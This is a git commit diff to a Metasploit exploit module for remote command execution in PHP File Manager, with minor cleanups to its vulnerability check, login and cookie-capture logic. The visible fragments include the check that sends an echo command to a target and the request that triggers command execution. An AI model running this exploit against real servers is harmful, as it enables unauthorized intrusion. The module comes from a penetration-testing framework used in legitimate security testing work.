Update phpfilemanager_rce.rb

bug/bundler_fix
JT 2015-12-04 06:20:43 +08:00
parent 28ca899914
commit 3bbc413935
1 changed files with 4 additions and 7 deletions

View File

@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
txt = Rex::Text.rand_text_alpha(8)
res = http_send_command("echo #{txt}")
if res and res.body =~ /#{txt}/
if res && res.body =~ /#{txt}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def push
uri = normalize_uri(target_uri.path.to_s)
uri = normalize_uri(target_uri.path)
# To push the Enter button
res = send_request_cgi({
@ -83,15 +83,12 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Failure::Unknown, "Failed to trigger the Enter button")
end
location = res.headers['Location']
if res && res.headers && res.code == 302 && location =~ /index.php/
if res && res.headers && res.code == 302
print_good("#{peer} - Logged in to the file manager")
cookie = res.get_cookies
cookie
else
fail_with(Failure::Unknown, "#{peer} - Error entering the file manager")
return
end
end
@ -99,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookie = push()
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s),
'uri' => normalize_uri(target_uri.path),
'cookie' => cookie,
'vars_get' => {
'action' => '6',